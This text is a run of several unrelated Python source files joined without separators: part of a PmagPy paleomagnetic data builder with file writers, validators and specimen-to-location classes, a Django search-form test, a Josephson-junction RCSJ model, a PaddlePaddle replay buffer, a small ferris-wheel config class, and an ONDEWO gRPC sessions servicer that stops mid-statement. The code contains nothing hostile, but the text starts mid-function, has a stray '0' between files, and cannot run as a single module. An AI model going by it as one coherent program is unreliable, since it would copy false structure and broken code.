except KeyError: add_string = '' item.er_data[key] = '' if key == 'er_citation_names' and not add_string.strip('\t'): add_string = 'This study' er_string.append(add_string) er_string = '\t'.join(er_string) er_strings.append(er_string) # if we are writing a pmag file AND this particular item has pmag data, # compile this item's pmag data if do_pmag and do_this_pmag: pmag_string.append(item.name) for ancestor in ancestors: pmag_string.append(ancestor) # get an item's descendents (only req'd for pmag files) descendents = self.get_descendents(item) more_headers = [] more_strings = [] # add in appropriate descendents possible_types = ['specimen', 'sample', 'site'] for num, descendent_list in enumerate(descendents): item_string = get_item_string(descendent_list) more_strings.append(item_string) more_headers.append('er_' + possible_types[num] + '_names') ind = len(pmag_string) pmag_string.extend(more_strings) if more_headers == pmag_full_headers[ind:ind+len(more_strings)]: pass else: pmag_full_headers[ind:ind] = more_headers # write out all needed values for key in pmag_actual_headers: try: add_string = item.pmag_data[key] except KeyError: add_string = '' item.pmag_data[key] = '' # add default values if key == 'er_citation_names' and not add_string.strip('\t'): add_string = 'This study' pmag_string.append(str(add_string)) pmag_string = '\t'.join(pmag_string) pmag_strings.append(pmag_string) # write actual pmag file with all collected data 
pmag_header_string = '\t'.join(pmag_full_headers) pmag_outfile = '' if do_pmag: pmag_outfile = open(os.path.join(self.WD, pmag_start + '.txt'), 'w') pmag_outfile.write('tab\t' + pmag_start + '\n') pmag_outfile.write(pmag_header_string + '\n') for string in pmag_strings: pmag_outfile.write(string + '\n') pmag_outfile.close() # write actual er file with all collected data er_header_string = '\t'.join(er_full_headers) er_outfile = '' if do_er: er_outfile = open(os.path.join(self.WD, er_start + '.txt'), 'w') er_outfile.write('tab\t' + er_start + '\n') er_outfile.write(er_header_string + '\n') for string in er_strings: er_outfile.write(string + '\n') er_outfile.close() return er_outfile, pmag_outfile def write_result_file(self): actual_headers = sorted(self.headers['result']['pmag'][0]) add_headers = ['pmag_result_name', 'er_specimen_names', 'er_sample_names', 'er_site_names', 'er_location_names'] full_headers = add_headers[:] full_headers.extend(actual_headers) header_string = '\t'.join(full_headers) results = self.data_lists['result'][0] result_strings = [] for result in results: result_string = [] result_string.append(result.name) spec_str = get_item_string(result.specimens) samp_str = get_item_string(result.samples) site_str = get_item_string(result.sites) loc_str = get_item_string(result.locations) strings = [spec_str, samp_str, site_str, loc_str] for string in strings: result_string.append(string) for key in actual_headers: add_string = result.pmag_data[key] if key == 'er_citation_names' and not add_string.strip('\t'): add_string = 'This study' result_string.append(str(add_string)) result_string = '\t'.join(result_string) result_strings.append(result_string) outfile = open(os.path.join(self.WD, 'pmag_results.txt'), 'w') outfile.write('tab\tpmag_results\n') outfile.write(header_string + '\n') for string in result_strings: outfile.write(string + '\n') outfile.close() return outfile def write_age_file(self): """ Write er_ages.txt based on updated ErMagicBuilder data object """ if not self.write_ages: print('-I- No age data available to write') return first_headers = self.first_age_headers actual_headers = sorted(self.headers['age']['er'][0]) for header in first_headers: if header in actual_headers: actual_headers.remove(header) add_headers = ['er_specimen_name', 'er_sample_name', 'er_site_name', 'er_location_name'] actual_headers[:0] = first_headers full_headers = add_headers[:] full_headers.extend(actual_headers) header_string = '\t'.join(full_headers) ages = [] for dtype in ['specimen', 'sample', 'site', 'location']: ages_list = sorted(self.data_lists[dtype][0], key=lambda item: item.name) ages.extend(ages_list) age_strings = [] for age in ages: ind = self.ancestry.index(age.dtype) ancestors = ['' for num in range(len(self.ancestry) - (ind+2))] data_found = False string = '' if age.dtype == 'specimen': string += age.name + '\t' elif age.dtype == 'sample': string += '\t' + age.name + '\t' elif age.dtype == 'site': string += '\t\t' + age.name + '\t' elif age.dtype == 'location': string += '\t\t\t' + age.name + '\t' parent = age.get_parent() grandparent = None if parent: ancestors[0] = parent.name grandparent = parent.get_parent() if grandparent: ancestors[1] = grandparent.name greatgrandparent = grandparent.get_parent() if greatgrandparent: ancestors[2] = greatgrandparent.name for ancestor in ancestors: string += ancestor + '\t' for key in actual_headers: try: add_string = age.age_data[key] except KeyError: add_string = '' age.age_data[key] = '' if add_string and not key == 
'er_citation_names': data_found = True if key == 'er_citation_names' and not add_string.strip('\t'): add_string = 'This study' string += add_string + '\t' # prevent extra '' at the end of age string if string.endswith('\t'): string = string[:-1] # only write ages to file if there is data provided if data_found: age_strings.append(string) outfile = open(os.path.join(self.WD, 'er_ages.txt'), 'w') outfile.write('tab\ter_ages\n') outfile.write(header_string + '\n') if not age_strings: outfile.close() os.remove(os.path.join(self.WD, 'er_ages.txt')) return False for string in age_strings: outfile.write(string + '\n') outfile.close() return outfile ## Validations ## def validate_data(self): """ Validate specimen, sample, site, and location data. """ warnings = {} spec_warnings, samp_warnings, site_warnings, loc_warnings = {}, {}, {}, {} if self.specimens: spec_warnings = self.validate_items(self.specimens, 'specimen') if self.samples: samp_warnings = self.validate_items(self.samples, 'sample') if self.sites: site_warnings = self.validate_items(self.sites, 'site') if self.locations: loc_warnings = self.validate_items(self.locations, 'location') return spec_warnings, samp_warnings, site_warnings, loc_warnings def validate_items(self, item_list, item_type): """ Go through a list Pmag_objects and check for: parent errors, children errors, type errors. Return a dictionary of exceptions in this format: {sample1: {'parent': [warning1, warning2, warning3], 'child': [warning1, warning2]}, sample2: {'child': [warning1], 'type': [warning1, warning2]}, ...} """ def append_or_create_dict_item(warning_type, dictionary, key, value): """ Add to dictionary with this format: {key1: {warning_type1: [value1, value2], warning_type2: [value1]}, ...} """ if not value: return try: name = key.name except AttributeError: name = key if not name in dictionary: dictionary[name] = {} if not warning_type in dictionary[name]: dictionary[name][warning_type] = [] for v in value: dictionary[name][warning_type].append(v) def check_item_type(item, item_type):#, warnings=None): """ Make sure that item has appropriate type, and is in the data object. 
""" warnings = [] item_list, item_class, item_constructor = self.data_lists[item_type] if not isinstance(item, item_class): warnings.append(PmagException('wrong type')) if item not in item_list: warnings.append(PmagException('not in data object')) return warnings def check_item_for_parent(item, item_type, parent_type): """ Make sure that item has a parent of the correct type """ if not parent_type: return [] if not isinstance(item, Pmag_object): return [] warnings = [] parent = item.get_parent() parent_list, parent_class, parent_constructor = self.data_lists[parent_type] if not parent or not parent.name: warnings.append(PmagException('missing parent')) return warnings if not isinstance(parent, parent_class): warnings.append(PmagException('invalid parent type', parent)) if not parent in parent_list: warnings.append(PmagException('parent not in data object', parent)) return warnings def check_item_for_children(item, child_type): """ Make sure that any children are of the correct type, and are in the data object """ if not child_type: return [] warnings = [] children = item.children child_list, child_class, child_constructor = self.data_lists[child_type] for child in children: if not isinstance(child, child_class): warnings.append(PmagException('child has wrong type', child)) if not child in child_list: warnings.append(PmagException('child not in data object', child)) return warnings warnings = {} type_ind = self.ancestry.index(item_type) parent_type = self.ancestry[type_ind+1] child_type = self.ancestry[type_ind-1] for item in item_list: #warnings[item] = [] type_warnings = check_item_type(item, item_type) append_or_create_dict_item('type', warnings, item, type_warnings) parent_warnings = check_item_for_parent(item, item_type, parent_type) append_or_create_dict_item('parent', warnings, item, parent_warnings) child_warnings = check_item_for_children(item, child_type) append_or_create_dict_item('children', warnings, item, child_warnings) return warnings def validate_results(self, result_list): """ """ def in_data_obj(lst, dtype): missing = [] for item in lst: if item not in self.data_lists[dtype][0]: try: item_name = item.name except AttributeError: item_name = str(item) missing.append(item_name) return missing def add_result_dict_item(dictionary, key, value): if not value: return elif key not in dictionary: dictionary[key] = value warnings = {} for result in result_list: res_warnings = {} if result.specimens: add_result_dict_item(res_warnings, 'specimen', in_data_obj(result.specimens, 'specimen')) if result.samples: add_result_dict_item(res_warnings, 'sample', in_data_obj(result.samples, 'sample')) if result.sites: add_result_dict_item(res_warnings, 'site', in_data_obj(result.sites, 'site')) if result.locations: add_result_dict_item(res_warnings, 'location', in_data_obj(result.locations, 'location')) if res_warnings: warnings[result.name] = res_warnings return warnings def validate_measurements(self, meas_list): meas_warnings = {} for meas in meas_list: warnings = [] if not meas.specimen: warnings.append(PmagException('missing parent')) elif not meas.specimen in self.specimens: warnings.append(PmagException('parent not in data object', meas.specimen)) if warnings: meas_warnings[meas] = {} meas_warnings[meas]['parent'] = warnings return meas_warnings # helper methods def get_ancestors(self, pmag_object): ancestors = [] ancestors = ['' for num in range(len(self.ancestry) - (self.ancestry_ind+2))] parent = self.ancestry[self.ancestry_ind+1] parent = pmag_object.get_parent() grandparent, 
greatgrandparent = None, None if parent: ancestors[0] = parent.name grandparent = parent.get_parent() if grandparent: ancestors[1] = grandparent.name greatgrandparent = grandparent.get_parent() if greatgrandparent: ancestors[2] = greatgrandparent.name return ancestors def get_descendents(self, pmag_object): descendents = self.ancestry[1:self.ancestry_ind] descendents = ['' for num in range(len(descendents))] children = pmag_object.children if children: descendents[-1] = children grandchildren = [] for child in pmag_object.children: if pmag_object.children: grandchildren.extend(child.children) if grandchildren: descendents[-2] = grandchildren greatgrandchildren = [] for gchild in grandchildren: if gchild.children: greatgrandchildren.extend(gchild.children) if greatgrandchildren: descendents[-3] = greatgrandchildren return descendents def get_min_max_lat_lon(self, locations): """ Take a list of locations and return a dictionary with: location1: 'location_begin_lat', 'location_begin_lon', 'location_end_lat', 'location_end_lon'. and so on. """ d = {} for location in locations: sites = location.sites max_lat, min_lat = '', '' max_lon, min_lon = '', '' if not any(sites): d[location.name] = {'location_begin_lat': min_lat, 'location_begin_lon': min_lon, 'location_end_lat': max_lat, 'location_end_lon': max_lon} #return d continue lats, lons = [], [] # try to fill in min/max latitudes/longitudes from sites for site in sites: if site.er_data['site_lon']: lons.append(site.er_data['site_lon']) if site.er_data['site_lat']: lats.append(site.er_data['site_lat']) if lats: lats = [float(lat) for lat in lats] max_lat = max(lats) min_lat = min(lats) if lons: lons = [float(lon) for lon in lons] max_lon = max(lons) min_lon = min(lons) d[location.name] = {'location_begin_lat': min_lat, 'location_begin_lon': min_lon, 'location_end_lat': max_lat, 'location_end_lon': max_lon} return d class PmagException(Exception): def __init__(self, message, obj=None): super(PmagException, self).__init__(message) self.obj = obj # measurements can be uniquely identified by experiment name + measurement # # location, site, sample, and specimen names are ALL required headers for each measurement class Measurement(object): def __init__(self, experiment_name, meas_number, specimen=None, data=None): self.experiment_name = experiment_name self.meas_number = meas_number self.name = experiment_name.strip() + '_' + str(meas_number) self.specimen = specimen self.er_data = remove_dict_headers(data) self.pmag_data = {} def __repr__(self): return 'Measurement: ' + self.name class Pmag_object(object): """ Base class for Specimens, Samples, Sites, etc. """ def __init__(self, name, dtype, data_model=None, er_data=None, pmag_data=None, results_data=None):#, headers={}): if not data_model: self.data_model = validate_upload.get_data_model() else: self.data_model = data_model self.name = name.strip() # names shouldn't start or end with a space! 
self.dtype = dtype er_name = 'er_' + dtype + 's' pmag_name = 'pmag_' + dtype + 's' self.pmag_reqd_headers, self.pmag_optional_headers = self.get_headers(pmag_name) self.er_reqd_headers, self.er_optional_headers = self.get_headers(er_name) self.results_reqd_headers, self.results_optional_headers = self.get_headers('pmag_results') er_reqd_data = {key: '' for key in self.er_reqd_headers} pmag_reqd_data = {key: '' for key in self.pmag_reqd_headers} results_reqd_data = {key: '' for key in self.results_reqd_headers} if er_data: self.er_data = combine_dicts(er_data, er_reqd_data) else: self.er_data = er_reqd_data if pmag_data: self.pmag_data = combine_dicts(pmag_data, pmag_reqd_data) else: self.pmag_data = pmag_reqd_data if results_data: self.results_data = combine_dicts(results_data, results_reqd_data) else: self.results_data = None if dtype in ('specimen', 'sample', 'site', 'location'): self.age_reqd_headers, self.age_optional_headers = self.get_headers('er_ages') self.age_data = {key: '' for key in self.age_reqd_headers} remove_dict_headers(self.age_data) # take out unneeded headers remove_dict_headers(self.er_data) remove_dict_headers(self.pmag_data) # make sure all longitudes/declinations/azimuths are in 0-360 self.er_data = pmag.adjust_all_to_360(self.er_data) def __repr__(self): return self.dtype + ": " + self.name def get_headers(self, data_type): """ If data model not present, get data model from Earthref site or PmagPy directory. Return a list of required headers and optional headers for given data type. """ try: data_dict = self.data_model[data_type] except KeyError: return [], [] reqd_headers = sorted([header for header in list(data_dict.keys()) if data_dict[header]['data_status'] == 'Required']) optional_headers = sorted([header for header in list(data_dict.keys()) if data_dict[header]['data_status'] != 'Required']) return reqd_headers, optional_headers def update_data(self, er_data=None, pmag_data=None, replace_data=False): if er_data: if replace_data: self.er_data = er_data else: self.er_data = combine_dicts(er_data, self.er_data) if er_data: pmag.adjust_all_to_360(self.er_data) if pmag_data: if replace_data: self.pmag_data = pmag_data else: self.pmag_data = combine_dicts(pmag_data, self.pmag_data) if pmag_data: pmag.adjust_all_to_360(self.pmag_data) def add_child(self, child): if 'children' in dir(self): self.children.append(child) class Specimen(Pmag_object): """ Specimen level object """ def __init__(self, name, sample, data_model=None, er_data=None, pmag_data=None): dtype = 'specimen' super(Specimen, self).__init__(name, dtype, data_model, er_data, pmag_data) self.sample = sample or "" self.children = [] self.propagate_data() def get_parent(self): return self.sample def set_parent(self, new_samp): """ Set self.sample as either an empty string, or with a new Sample. 
""" self.sample = new_samp if new_samp: if not isinstance(new_samp, Sample): raise Exception self.propagate_data() return new_samp def change_specimen(self, new_name, new_sample=None, er_data=None, pmag_data=None, replace_data=False): self.name = new_name if new_sample: if self.sample: self.sample.specimens.remove(self) self.sample = new_sample self.sample.specimens.append(self) self.update_data(er_data, pmag_data, replace_data) self.propagate_data() def propagate_data(self): if not self.sample: return for dtype in ['class', 'lithology', 'type']: if 'specimen_' + dtype in list(self.er_data.keys()): if (not self.er_data['specimen_' + dtype]) or (self.er_data['specimen_' + dtype].lower() == "not specified"): if self.sample.er_data['sample_' + dtype]: value = self.sample.er_data['sample_' + dtype] self.er_data['specimen_' + dtype] = value class Sample(Pmag_object): """ Sample level object """ def __init__(self, name, site, data_model=None, er_data=None, pmag_data=None): dtype = 'sample' super(Sample, self).__init__(name, dtype, data_model, er_data, pmag_data) self.specimens = [] self.children = self.specimens self.site = site or "" self.propagate_data() def get_parent(self): return self.site def set_parent(self, new_site): """ Set self.site as either an empty string, or with a new Site. """ if new_site: if not isinstance(new_site, Site): raise Exception self.site = new_site self.propagate_data() return new_site def change_sample(self, new_name, new_site=None, er_data=None, pmag_data=None, replace_data=False): self.name = new_name if new_site: if self.site: self.site.samples.remove(self) self.site = new_site self.site.samples.append(self) self.update_data(er_data, pmag_data, replace_data) self.propagate_data() def propagate_data(self): if not self.site: return for dtype in ['class', 'lithology', 'type']: samp_key = 'sample_' + dtype site_key = 'site_' + dtype if samp_key in list(self.er_data.keys()): if (not self.er_data[samp_key]) or (self.er_data[samp_key].lower() == "not specified"): if site_key not in self.site.er_data: self.site.er_data[site_key] = '' elif self.site.er_data[site_key]: value = self.site.er_data[site_key] self.er_data[samp_key] = value for dtype in ['lat', 'lon']: samp_key = 'sample_' + dtype site_key = 'site_' + dtype if samp_key in list(self.er_data.keys()): if not self.er_data[samp_key]: if site_key in list(self.site.er_data.keys()): self.er_data[samp_key] = self.site.er_data[site_key] class Site(Pmag_object): """ Site level object """ def __init__(self, name, location, data_model=None, er_data=None, pmag_data=None): dtype = 'site' super(Site, self).__init__(name, dtype, data_model, er_data, pmag_data) self.samples = [] self.children = self.samples self.location = location or "" def get_parent(self): return self.location def set_parent(self, new_loc): if new_loc: if not isinstance(new_loc, Location): raise Exception self.location = new_loc return new_loc def change_site(self, new_name, new_location=None, new_er_data=None, new_pmag_data=None, replace_data=False): """ Update a site's name, location, er_data, and pmag_data. By default, new data will be added in to pre-existing data, overwriting existing values. If replace_data is True, the new data dictionary will simply take the place of the existing dict. 
""" self.name = new_name if new_location: self.location = new_location self.update_data(new_er_data, new_pmag_data, replace_data) class Location(Pmag_object): """ Location level object """ def __init__(self, name, parent=None, data_model=None, er_data=None, pmag_data=None): dtype = 'location' super(Location, self).__init__(name, dtype, data_model, er_data, pmag_data) #def __init__(self, name, dtype, data_model=None, er_data=None, pmag_data=None, results_data=None):#, headers={}): self.sites = [] self.children = self.sites def get_parent(self): return False def set_parent(self, parent=None): return False def change_location(self, new_name, new_er_data=None, new_pmag_data=None, replace_data=False): self.name = new_name #if new_er_data: # self.er_data = combine_dicts(new_er_data, self.er_data) self.update_data(new_er_data, new_pmag_data, replace_data) class Result(object): def __init__(self, name, specimens='', samples='', sites='', locations='', pmag_data=None, data_model=None): if not data_model: self.data_model = validate_upload.get_data_model() else: self.data_model = data_model self.name = name.strip() # names shouldn't start or end with a space! self.specimens = specimens self.samples = samples self.sites = sites self.locations = locations self.er_data = {} pmag_name = 'pmag_results' self.pmag_reqd_headers, self.pmag_optional_headers = self.get_headers(pmag_name) #self.results_reqd_headers, self.results_optional_headers = self.get_headers('pmag_results') pmag_reqd_data = {key: '' for key in self.pmag_reqd_headers} #results_reqd_data = {key: '' for key in self.results_reqd_headers} if pmag_data: self.pmag_data = combine_dicts(pmag_data, pmag_reqd_data) else: self.pmag_data = pmag_reqd_data # make sure all longitudes/declinations/azimuths are in 0-360 self.pmag_data = pmag.adjust_all_to_360(self.pmag_data) def __repr__(self): if self.pmag_data: descr = self.pmag_data.get('result_description') else: descr = '' return 'Result: {}, {}'.format(self.name, descr) def get_headers(self, data_type): """ If data model not present, get data model from Earthref site or PmagPy directory. Return a list of required headers and optional headers for given data type. 
""" try: data_dict = self.data_model[data_type] except KeyError: return [], [] reqd_headers = sorted([header for header in list(data_dict.keys()) if data_dict[header]['data_status'] == 'Required']) optional_headers = sorted([header for header in list(data_dict.keys()) if data_dict[header]['data_status'] != 'Required']) return reqd_headers, optional_headers def change_result(self, new_name, new_pmag_data=None, specs=None, samps=None, sites=None, locs=None, replace_data=False): self.name = new_name if new_pmag_data: self.pmag_data = combine_dicts(new_pmag_data, self.pmag_data) self.specimens = specs self.samples = samps self.sites = sites self.locations = locs # make sure all longitudes/declinations/azimuths are in 0-360 self.pmag_data = pmag.adjust_all_to_360(self.pmag_data) if __name__ == '__main__': wd = pmag.get_named_arg('-WD', default_val=os.getcwd()) builder = ErMagicBuilder(wd) builder.get_data() # Random helper methods that MIGHT belong in pmag.py def get_item_string(items_list): """ take in a list of pmag_objects return a colon-delimited list of the findable names """ if not items_list: return '' string_list = [] for item in items_list: try: name = item.name string_list.append(name) except AttributeError: pass return ":".join(string_list) def put_list_value_first(lst, first_value): if first_value in lst: lst.remove(first_value) lst[:0] = [first_value] def remove_dict_headers(data_dict): for header in ['er_specimen_name', 'er_sample_name', 'er_site_name', 'er_location_name', 'pmag_result_name', 'er_specimen_names', 'er_sample_names', 'er_site_names', 'magic_experiment_name', 'measurement_number']: if header in list(data_dict.keys()): data_dict.pop(header) return data_dict def remove_list_headers(data_list): for header in ['er_specimen_name', 'er_sample_name', 'er_site_name', 'er_location_name', 'pmag_result_name', 'er_specimen_names', 'er_sample_names', 'er_site_names', 'magic_experiment_name', 'measurement_number']: if header in data_list: data_list.remove(header) return data_list def combine_dicts(new_dict, old_dict): """ returns a dictionary with all key, value pairs from new_dict. also returns key, value pairs from old_dict, if that key does not exist in new_dict. if a key is present in both new_dict and old_dict, the new_dict value will take precedence. 
""" old_data_keys = list(old_dict.keys()) new_data_keys = list(new_dict.keys()) all_keys = set(old_data_keys).union(new_data_keys) combined_data_dict = {} for k in all_keys: try: combined_data_dict[k] = new_dict[k] except KeyError: combined_data_dict[k] = old_dict[k] return combined_data_dict from __future__ import absolute_import, unicode_literals from datetime import timedelta from django.core.urlresolvers import reverse from django.test import TestCase from django.utils import timezone from testapp.models import Person, Message class FormsTest(TestCase): def test_warningsform(self): person = Person.objects.create() emailaddress = person.emailaddress_set.create() self.assertEqual( self.client.get(person.urls['message']).status_code, 200) self.assertEqual( self.client.post(person.urls['message']).status_code, 200) response = self.client.post(person.urls['message'], { 'sent_to': emailaddress.pk, 'message': '', }) self.assertRedirects(response, person.urls['detail']) self.assertEqual(Message.objects.count(), 1) response = self.client.post(person.urls['message'], { 'sent_to': emailaddress.pk, 'message': ' ', }) self.assertEqual(response.status_code, 200) self.assertContains(response, 'Please review the following warnings:') response = self.client.post(person.urls['message'], { 'sent_to': emailaddress.pk, 'message': ' hello ', 'ignore_warnings': 1, }) self.assertRedirects(response, person.urls['detail']) self.assertEqual(Message.objects.count(), 2) def test_searchform(self): date = timezone.now().replace(year=2012, month=10, day=1) for i in range(100): Person.objects.create( given_name='Given %s' % i, family_name='Family %s' % i, is_active=bool(i % 3), created=date + timedelta(days=i), ) list_url = reverse('testapp_person_list') self.assertContains( self.client.get(list_url), '1 - 5 / 100', ) self.assertContains( self.client.get(list_url + '?query=42'), '1 - 1 / 1', ) self.assertContains( self.client.get(list_url + '?query=is:active'), '1 - 5 / 66', ) self.assertContains( self.client.get(list_url + '?query=is:inactive'), '1 - 5 / 34', ) self.assertContains( self.client.get(list_url + '?query=active:yes'), '1 - 5 / 66', ) self.assertContains( self.client.get(list_url + '?query=active:off'), '1 - 5 / 34', ) self.assertContains( self.client.get(list_url + '?query=year:2012'), '1 - 5 / 92', ) self.assertContains( self.client.get(list_url + '?query="Given+1"+year%3A2012'), '1 - 5 / 11', ) self.assertContains( self.client.get(list_url + '?query="%2BGiven+1"+year%3A2012'), '1 - 5 / 11', ) self.assertContains( self.client.get(list_url + '?query="-Given+1"+year%3A2012'), '1 - 5 / 81', ) # Form field self.assertContains( self.client.get(list_url + '?is_active=1'), '1 - 5 / 100', ) self.assertContains( self.client.get(list_url + '?is_active=2'), '1 - 5 / 66', ) self.assertContains( self.client.get(list_url + '?is_active=3'), '1 - 5 / 34', ) # Invalid query response = self.client.get(list_url + '?created__year=abc') self.assertEqual(response.status_code, 302) self.assertTrue(response['location'].endswith('?clear=1')) # Mixed quick (only inactive) and form field (only active) # Form field takes precedence self.assertContains( self.client.get(list_url + '?is_active=2&query=is:inactive'), '1 - 5 / 66', ) # Search form persistence self.assertContains( self.client.get(list_url + '?s=1&is_active=3'), '1 - 5 / 34', ) self.assertContains( self.client.get(list_url), '1 - 5 / 34', ) self.assertContains( self.client.get(list_url + '?clear=1'), '1 - 5 / 100', ) # Ordering self.assertContains( 
self.client.get(list_url), 'Given 0 Family 0', ) response = self.client.get(list_url + '?o=name') self.assertContains(response, 'Given 12 Family 12') self.assertContains( response, ' name') self.assertContains( response, ' is active') response = self.client.get(list_url + '?o=-name') self.assertContains(response, 'Given 99 Family 99') self.assertContains( response, ' name') self.assertContains( response, ' is active') response = self.client.get(list_url + '?o=is_active') self.assertContains(response, 'Given 14 Family 14') self.assertNotContains(response, 'Given 12 Family 12') # inactive self.assertContains( response, ' name') self.assertContains( response, ' is active') # TODO multiple choice fields # TODO SearchForm.default # TODO autocompletion widget tests? 0 """Resistively and capacitively shunted junction (RCSJ) model. For details, see Tinkham §6.3. All units are SI unless explicitly stated otherwise. The following notation is used: Ic critical_current R resistance C capacitance """ import numpy as np from scipy.constants import e, hbar def plasma_frequency(Ic, C): return np.sqrt(2 * e * Ic / (hbar * C)) def quality_factor(Ic, R, C): """Compute the quality factor of an RCSJ. The quality factor distinguishes overdamped (Q < 1) from underdamped (Q > 1) junctions. """ return plasma_frequency(Ic=Ic, C=C) * R * C def retrapping_current(Ic, R, C): """Estimate the retrapping current of an underdamped (hysteretic) RCSJ.""" return 4 * Ic / (np.pi * quality_factor(Ic=Ic, R=R, C=C)) # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import copy import random from parl.common.error_handling import * class Experience(object): def __init__(self, sensor_inputs, states, actions, game_status): check_type_error(list, type(sensor_inputs)) self.sensor_inputs = sensor_inputs # (observation, reward) self.states = states # other states self.actions = actions # actions taken self.game_status = game_status # game status, e.g., max_steps or # episode end reached self.next_exp = None # copy of the next Experience def set_next_exp(self, next_exp): self.next_exp = copy.deepcopy(next_exp) #TODO: write copy function class Sample(object): """ A Sample represents one or a sequence of Experiences """ def __init__(self, i, n): self.i = i # starting index of the first experience in the sample self.n = n # length of the sequence def __repr__(self): return str(self.__class__) + ": " + str(self.__dict__) class ReplayBuffer(object): def __init__(self, capacity, exp_type=Experience): """ Create Replay buffer. Args: exp_type(object): Experience class used in the buffer. capacity(int): Max number of experience to store in the buffer. When the buffer overflows the old memories are dropped. 
""" check_gt(capacity, 1) self.buffer = [] # a circular queue to store experiences self.capacity = capacity # capacity of the buffer self.last = -1 # the index of the last element in the buffer self.exp_type = exp_type # Experience class used in the buffer def __len__(self): return len(self.buffer) def buffer_end(self, i): return i == self.last def next_idx(self, i): if self.buffer_end(i): return -1 else: return (i + 1) % self.capacity def add(self, exp): """ Store one experience into the buffer. Args: exp(self.exp_type): the experience to store in the buffer. """ check_type_error(self.exp_type, type(exp)) # the next_exp field should be None at this point check_eq(exp.next_exp, None) if len(self.buffer) < self.capacity: self.buffer.append(None) self.last = (self.last + 1) % self.capacity self.buffer[self.last] = copy.deepcopy(exp) def sample(self, num_samples): """ Generate a batch of Samples. Each Sample represents a sequence of Experiences (length>=1). And a sequence must not cross the boundary between two games. Args: num_samples(int): Number of samples to generate. Returns: A generator of Samples """ if len(self.buffer) <= 1: yield [] for _ in xrange(num_samples): while True: idx = random.randint(0, len(self.buffer) - 1) if not self.buffer_end(idx) and not self.buffer[ idx].game_status: break yield Sample(idx, 1) def get_experiences(self, sample): """ Get Experiences from a Sample Args: sample(Sample): a Sample representing a sequence of Experiences Return(list): a list of Experiences """ exps = [] p = sample.i for _ in xrange(sample.n): check_last_exp_error( self.buffer_end(p) or self.buffer[p].game_status, p, self.buffer[p].game_status) # make a copy of the buffer element as e may be modified somewhere e = copy.deepcopy(self.buffer[p]) p = self.next_idx(p) e.set_next_exp(self.buffer[p]) exps.append(e) return exps class FerrisWheelConfig: speed_limit = 100 speed_increment = 10 max_degrees = 359 check_button_press_wait_seconds = 2# Copyright 2021 ONDEWO GmbH # # Licensed under the Apache License, Version 2.0 (the License); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an AS IS BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
from abc import ABCMeta, abstractmethod from typing import Dict, Callable, List, Optional import grpc from ondewo.nlu import session_pb2, intent_pb2, user_pb2, context_pb2 from ondewo.nlu.client import Client as NLUClient from ondewo.logging.decorators import Timer from ondewo.logging.logger import logger_console from ondewo_bpi.autocoded.agent_grpc_autocode import AutoAgentsServicer from ondewo_bpi.autocoded.aiservices_grpc_autocode import AutoAiServicesServicer from ondewo_bpi.autocoded.context_grpc_autocode import AutoContextsServicer from ondewo_bpi.autocoded.entity_type_grpc_autocode import AutoEntityTypesServicer from ondewo_bpi.autocoded.intent_grpc_autocode import AutoIntentsServicer from ondewo_bpi.autocoded.project_role_grpc_autocode import AutoProjectRolesServicer from ondewo_bpi.autocoded.session_grpc_autocode import AutoSessionsServicer from ondewo_bpi.autocoded.user_grpc_autocode import AutoUsersServicer from ondewo_bpi.constants import SipTriggers, QueryTriggers from ondewo_bpi.message_handler import MessageHandler, SingleMessageHandler from ondewo_bpi.helpers import get_session_from_response class BpiSessionsServices(AutoSessionsServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass def __init__(self) -> None: self.intent_handlers: Dict[str, Callable] = {} self.trigger_handlers: Dict[str, Callable] = { i.value: self.trigger_function_not_implemented for i in [*SipTriggers, *QueryTriggers] } def register_intent_handler(self, intent_name: str, handler: Callable) -> None: self.intent_handlers[intent_name] = handler def register_trigger_handler(self, trigger: str, handler: Callable) -> None: self.trigger_handlers[trigger] = handler def trigger_function_not_implemented( self, response: session_pb2.DetectIntentResponse, message: intent_pb2.Intent.Message, trigger: str, found_triggers: Dict[str, List[str]], ) -> None: logger_console.warning( { "message": f"no function for the trigger {trigger}, please subclass and implement", "trigger": trigger, "content": found_triggers[trigger], } ) def DetectIntent( self, request: session_pb2.DetectIntentRequest, context: grpc.ServicerContext ) -> session_pb2.DetectIntentResponse: try: text = request.query_input.text.text except Exception: logger_console.exception("something wrong in the bpi") text = "error" logger_console.warning( { "message": f"CAI-DetectIntentRequest to CAI, text input: {text}", "content": text, "text": text, "tags": ["text"], } ) cai_response = self.perform_detect_intent(request) intent_name = cai_response.query_result.intent.display_name logger_console.warning( { "message": f"CAI-DetectIntentResponse from CAI, intent_name: {intent_name}", "content": intent_name, "intent_name": intent_name, "session_id": get_session_from_response(cai_response), "tags": ["text"], } ) cai_response = self.process_messages(cai_response) return self.process_intent_handler(cai_response) @Timer(log_arguments=False, recursive=True) def perform_detect_intent(self, request: session_pb2.DetectIntentRequest, ) -> session_pb2.DetectIntentResponse: return self.client.services.sessions.detect_intent(request) @Timer(log_arguments=False, recursive=True) def process_messages(self, response: session_pb2.DetectIntentResponse, ) -> session_pb2.DetectIntentResponse: new_response = None for j, message in enumerate(response.query_result.fulfillment_messages): found_triggers = MessageHandler.get_triggers(message, get_session_from_response(response)) for found_trigger in found_triggers: new_response = 
